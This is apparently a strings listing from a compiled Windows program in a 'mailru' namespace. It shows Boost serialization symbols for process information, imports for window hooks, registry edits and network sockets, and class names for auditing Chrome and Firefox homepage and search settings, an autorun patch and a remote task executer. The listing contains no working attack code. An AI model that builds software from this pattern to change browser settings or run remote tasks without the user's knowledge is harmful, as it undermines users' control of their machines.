??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ@51
?get_const_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ
?get_const_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ
?get_const_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@A
?instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@A
?instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@A
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
GetProcessHeap
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ReportEventA
ADVAPI32.dll
FindExecutableW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
PSAPI.DLL
USERENV.dll
WTSAPI32.dll
CRYPT32.dll
VERSION.dll
CreateIoCompletionPort
GetCPInfo
ShellExecuteExW
CoInternetParseUrl
urlmon.dll
PeekNamedPipe
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
zcÁ
.?AV?$_Ref_count_obj@VAuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VAuditFirefox@mailru@@@std@@
.?AVAuditFirefox@mailru@@
.?AVCheckerFirefox@AuditFirefox@mailru@@
.?AVCheckerHomepageFirefox@AuditFirefox@mailru@@
.?AVCheckerDefaultSearchFirefox@AuditFirefox@mailru@@
.?AVCheckerVbmFirefox@AuditFirefox@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmFirefox@AuditFirefox@mailru@@@std@@
.?AVAuditGoogleChrome@mailru@@
.?AVCheckerCh@AuditGoogleChrome@mailru@@
.?AVCheckerHomepageCh@AuditGoogleChrome@mailru@@
.?AVCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@
.?AVCheckerVbmCh@AuditGoogleChrome@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Func_base@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8b00b026c9439ae5ee123b07f29330c6>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d67d694cf66593a3e1cbe5e0ac457329>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVsettings@firefox@mailru@@
.?AVvisual_bookmarks@firefox@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_852549d506963e7e0155e6efc072a19d>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8f47c682880de3b4c07e24e1559f18fc>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$thread_data@V?$bind_t@XV?$mf0@XVRemoteTasksExecuter@mailru@@@_mfi@boost@@V?$list1@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@@_bi@3@@_bi@boost@@@detail@boost@@
.?AV?$thread_data@V?$bind_t@XV?$mf1@XVRemoteTasksExecuter@mailru@@ABV?$shared_ptr@VTaskInterface@mailru@@@std@@@_mfi@boost@@V?$list2@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@V?$value@V?$shared_ptr@VTaskInterface@mailru@@@std@@@23@@_bi@3@@_bi@boost@@@detail@boost@@
.?AVTaskOneTimeWithChromeAutorunPatch@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_36e85ead181c17858a3fd5b6f23c888c>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d71f87b5d93256d8ef11999b81c97114>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_ff52a01b8c5e4b0628fdb56e2a8b3e6f>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVwindows_file_codecvt@@
.PAUattribute_name_info_tag@v2s_mt_nt5@log@boost@@
.?AVexception@sqlite@mailru@@
.?AV?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@
.?AU?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@
.?AUProcessKey@sysinfo@mailru@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@
